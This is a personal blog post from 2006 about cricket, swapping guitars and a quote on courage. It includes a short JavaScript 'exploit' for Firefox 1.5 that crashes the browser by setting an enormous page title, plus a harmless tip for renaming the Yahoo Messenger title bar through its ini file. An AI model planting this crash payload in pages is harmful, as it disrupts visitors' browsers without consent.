Web Analytics and Web Statistics by NextSTAT Caffeinated Cogitation: Mass Bunk(Yet Again)

Thursday, January 19, 2006

Mass Bunk(Yet Again)

Played "The Gentleman's Game" PROPERLY after around 3 years.
I also finally bartered guitars with Mr. Sahi for a few days and I believe I shall be busy for the rest of the week in this respect.
It's been over two weeks since I last had dinner at home and I wish to address this situation from tomorrow.
Here's the Exploit Code for Firefox (1.5 and above):

function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}

Now that we are on this subject , here's a small hack for yahoo messanger users:
See the title bar on top of messanger where it says "Yahoo Messanger"?
Just figured out how to put somethign else in it's place like,say, "Aseem's Messanger".
It's really simple.
Just go to c:\Program Files\Yahoo\Messanger. Open the file named ymsgr.ini (in notepad offcourse!).
Ok now this is the file that yahoo messanger uses to fill up the various bars.
At the end of the file (or even in between) add the following lines:

[APP TITLE]
caption=Aseem's Messanger

That's it. The next time you login, You'll get Aseem's Messange written there.
This is a rather basic example of hacking but it just goes to show how easy it can be at times.

Here's something nice:

Whatever you do, you need courage. Whatever course you decide upon, there is always someone to tell you that you are wrong. There are always difficulties arising that tempt you to believe your critics are right. To map out a course of action and follow it to an end requires some of the same courage that a soldier needs. Peace has its victories, but it takes brave men and women to win them.

Amen to that
A.G

0 Comments:

Post a Comment

<< Home